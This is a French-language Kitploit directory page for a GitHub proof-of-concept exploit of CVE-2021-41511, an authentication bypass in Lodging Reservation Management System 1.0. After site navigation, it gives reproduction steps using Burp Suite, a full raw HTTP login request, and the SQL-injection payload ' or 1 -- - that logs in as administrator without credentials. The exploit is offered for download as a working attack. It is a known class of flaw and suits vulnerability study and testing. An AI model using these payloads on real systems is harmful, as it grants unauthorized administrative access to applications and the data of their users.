Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41511 — Proof-of-concept exploit pour SQL injection et authentication bypass dans Lodging Reservation Management System 1.0, permettant un accès administrateur non autorisé via des payloads conçus. | Kitploit
Outils/GitHubGitHub/vidvansh/cve-2021-41511
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

Proof-of-concept exploit pour SQL injection et authentication bypass dans Lodging Reservation Management System 1.0, permettant un accès administrateur non autorisé via des payloads conçus.

Voir le dépôt
9il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41511

Titre de l'exploit : Système de gestion des réservations d'hébergement 1.0 - Injection SQL / Contournement d'authentification

Auteur de l'exploit : Nitin Sharma(vidvansh)

Page d'accueil du fournisseur : https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

Lien du logiciel : https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

Version : v1.0

Testé sur : Windows 10 - Serveur XAMPP

Description : La saisie du mot de passe est affectée par un contournement d'authentification en raison d'une désinfection incorrecte, ce qui permet d'accéder à des comptes non autorisés.

#Étapes pour reproduire : Étape 1 Allez au panneau d'administration du produit http://localhost/lodge/admin/login.php. Étape 2 – Saisissez n'importe quoi dans le nom d'utilisateur et le mot de passe. Étape 3 – Cliquez sur Connexion et capturez la requête dans Burp Suite. Étape 4 – Remplacez le nom d'utilisateur par ' OR 1 -- - et le mot de passe par ' OR 1 -- -. Étape 5 – Cliquez sur Envoyer et vous serez maintenant connecté en tant qu'administrateur.

Preuve de concept :

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

Contournement d'authentification :

Allez à la page de connexion de l'administrateur (http://localhost/lodge/admin/login.php), puis utilisez la payload ci-dessous comme nom d'utilisateur et mot de passe =>

Nom d'utilisateur : ' or 1 -- - Mot de passe : ' or 1 -- -

Télécharger l’outil